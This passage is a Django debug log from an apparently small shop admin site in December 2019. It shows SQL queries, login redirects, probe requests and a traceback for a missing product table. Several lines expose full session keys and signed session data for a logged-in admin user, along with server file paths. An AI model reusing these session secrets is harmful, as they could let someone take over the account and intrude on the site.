'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T14:09:37.874373+00:00'::timestamptz WHERE "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 14, 9, 37, 874373, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') [03/Dec/2019 14:09:37] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-03 14:09:38,164 utils 7577 139709839828736 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:09:38.153499+00:00'::timestamptz AND "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'); args=(datetime.datetime(2019, 12, 3, 14, 9, 38, 153499, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') DEBUG 2019-12-03 14:09:38,167 utils 7577 139709839828736 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 14:09:38,208 utils 7577 139709839828736 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 14:09:38,213 utils 7577 139709839828736 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T14:09:38.211131+00:00'::timestamptz WHERE "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 14, 9, 38, 211131, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') [03/Dec/2019 14:09:38] "GET / HTTP/1.0" 200 6019 [03/Dec/2019 14:09:38] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [03/Dec/2019 14:09:38] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [03/Dec/2019 14:09:38] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [03/Dec/2019 14:09:38] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-03 14:09:52,192 utils 7577 139709937760000 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:09:52.177509+00:00'::timestamptz AND "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'); args=(datetime.datetime(2019, 12, 3, 14, 9, 52, 177509, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') DEBUG 2019-12-03 14:09:52,196 utils 7577 139709937760000 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 14:09:52,200 utils 7577 139709937760000 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-03 14:09:52,227 utils 7577 139709937760000 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() DEBUG 2019-12-03 14:09:52,229 utils 7577 139709937760000 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() Internal Server Error: /shop/product/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ [03/Dec/2019 14:09:52] "GET /shop/product/ HTTP/1.0" 500 174980 DEBUG 2019-12-03 14:09:56,968 utils 7577 139709937760000 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T14:09:56.955142+00:00'::timestamptz AND "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'); args=(datetime.datetime(2019, 12, 3, 14, 9, 56, 955142, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') DEBUG 2019-12-03 14:09:56,972 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 14:09:57,023 utils 7577 139709937760000 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 14:09:57,029 utils 7577 139709937760000 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T14:09:57.026347+00:00'::timestamptz WHERE "django_session"."session_key" = 'ay9kvr13id1l3mndywjjww8xf7h6o32m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 14, 9, 57, 26347, tzinfo=), 'ay9kvr13id1l3mndywjjww8xf7h6o32m') [03/Dec/2019 14:09:57] "GET / HTTP/1.0" 200 6019 [03/Dec/2019 14:13:35] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:18:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:23:44] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:28:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:33:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:39:04] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:44:09] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:49:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:54:21] "GET / HTTP/1.0" 302 0 [03/Dec/2019 14:56:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 14:56:48,242 utils 7577 139709937760000 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lpq37uq45d98webt75a0iwftzsn7ak17' LIMIT 1; args=('lpq37uq45d98webt75a0iwftzsn7ak17',) DEBUG 2019-12-03 14:56:48,243 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lpq37uq45d98webt75a0iwftzsn7ak17', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T14:56:48.242624+00:00'::timestamptz); args=('lpq37uq45d98webt75a0iwftzsn7ak17', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 14, 56, 48, 242624, tzinfo=)) [03/Dec/2019 14:56:48] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 14:59:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Dec/2019 15:00:25] "GET /robots.txt HTTP/1.0" 404 6406 [03/Dec/2019 15:00:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 15:00:26,108 utils 7577 139709937760000 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lo3xh2vqhsfa25udc37prqkrnovcpra3' LIMIT 1; args=('lo3xh2vqhsfa25udc37prqkrnovcpra3',) DEBUG 2019-12-03 15:00:26,111 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lo3xh2vqhsfa25udc37prqkrnovcpra3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T15:00:26.109774+00:00'::timestamptz); args=('lo3xh2vqhsfa25udc37prqkrnovcpra3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 15, 0, 26, 109774, tzinfo=)) [03/Dec/2019 15:00:26] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 15:04:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:09:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:14:42] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:19:50] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:24:56] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:26:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:27:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 15:27:40,735 utils 7577 139709937760000 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'r9wm4d9wvrrvq2nvjg7525sk4emk340w' LIMIT 1; args=('r9wm4d9wvrrvq2nvjg7525sk4emk340w',) DEBUG 2019-12-03 15:27:40,737 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('r9wm4d9wvrrvq2nvjg7525sk4emk340w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T15:27:40.735964+00:00'::timestamptz); args=('r9wm4d9wvrrvq2nvjg7525sk4emk340w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 15, 27, 40, 735964, tzinfo=)) [03/Dec/2019 15:27:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 15:30:00] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:35:07] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:35:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 15:35:24,785 utils 7577 139709937760000 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uai1n2hrg9katko1kksmgbxcdnvqm9ds' LIMIT 1; args=('uai1n2hrg9katko1kksmgbxcdnvqm9ds',) DEBUG 2019-12-03 15:35:24,787 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uai1n2hrg9katko1kksmgbxcdnvqm9ds', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T15:35:24.786040+00:00'::timestamptz); args=('uai1n2hrg9katko1kksmgbxcdnvqm9ds', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 15, 35, 24, 786040, tzinfo=)) [03/Dec/2019 15:35:24] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 15:40:23] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:45:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:50:34] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:55:39] "GET / HTTP/1.0" 302 0 [03/Dec/2019 15:59:18] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:00:45] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:05:50] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:10:53] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:16:01] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 16:21:06] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:22:07] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:26:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 16:31:17] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:36:23] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:41:28] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:46:34] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:51:39] "GET / HTTP/1.0" 302 0 [03/Dec/2019 16:56:42] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:01:45] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:06:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:11:56] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:14:47] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:16:59] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:22:02] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:27:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:28:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 17:28:17,872 utils 7577 139709937760000 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fntmub3lr8l2h4levfuwk4hx1my07ot3' LIMIT 1; args=('fntmub3lr8l2h4levfuwk4hx1my07ot3',) DEBUG 2019-12-03 17:28:17,874 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fntmub3lr8l2h4levfuwk4hx1my07ot3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T17:28:17.873494+00:00'::timestamptz); args=('fntmub3lr8l2h4levfuwk4hx1my07ot3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 17, 28, 17, 873494, tzinfo=)) [03/Dec/2019 17:28:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 17:32:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:37:17] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:42:18] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:47:25] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:52:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 17:57:35] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:02:38] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:07:38] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:12:41] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:13:50] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:17:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:22:51] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 18:27:57] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:33:01] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:38:05] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:43:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:48:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:53:17] "GET / HTTP/1.0" 302 0 [03/Dec/2019 18:58:27] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:03:29] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:08:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:13:41] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:18:42] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:23:55] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:28:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:34:03] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:39:07] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:44:13] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:49:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:54:19] "GET / HTTP/1.0" 302 0 [03/Dec/2019 19:59:20] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:04:26] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:09:31] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:14:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:19:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:24:49] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:28:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 20:28:17,885 utils 7577 139709937760000 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'iviui4drtph7rtxs5ou3g9z2evohouhj' LIMIT 1; args=('iviui4drtph7rtxs5ou3g9z2evohouhj',) DEBUG 2019-12-03 20:28:17,887 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('iviui4drtph7rtxs5ou3g9z2evohouhj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T20:28:17.885797+00:00'::timestamptz); args=('iviui4drtph7rtxs5ou3g9z2evohouhj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 20, 28, 17, 885797, tzinfo=)) [03/Dec/2019 20:28:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 20:29:54] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:31:24] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:35:00] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:40:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:45:13] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:50:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 20:55:22] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:00:24] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:05:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:10:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:15:41] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:20:45] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:25:48] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:30:54] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 21:35:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:41:03] "GET / HTTP/1.0" 302 0 Not Found: /_cat/indices [03/Dec/2019 21:44:22] "GET /_cat/indices HTTP/1.0" 404 6411 [03/Dec/2019 21:46:07] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:51:12] "GET / HTTP/1.0" 302 0 [03/Dec/2019 21:56:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:01:17] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:06:22] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:11:27] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:16:31] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:21:35] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:26:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:31:47] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:36:51] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:41:53] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:42:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:46:59] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:52:01] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:57:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 22:58:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 22:58:17,821 utils 7577 139709937760000 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'x8t54qm75qe4bjqgs87n9qjz9uo75di2' LIMIT 1; args=('x8t54qm75qe4bjqgs87n9qjz9uo75di2',) DEBUG 2019-12-03 22:58:17,823 utils 7577 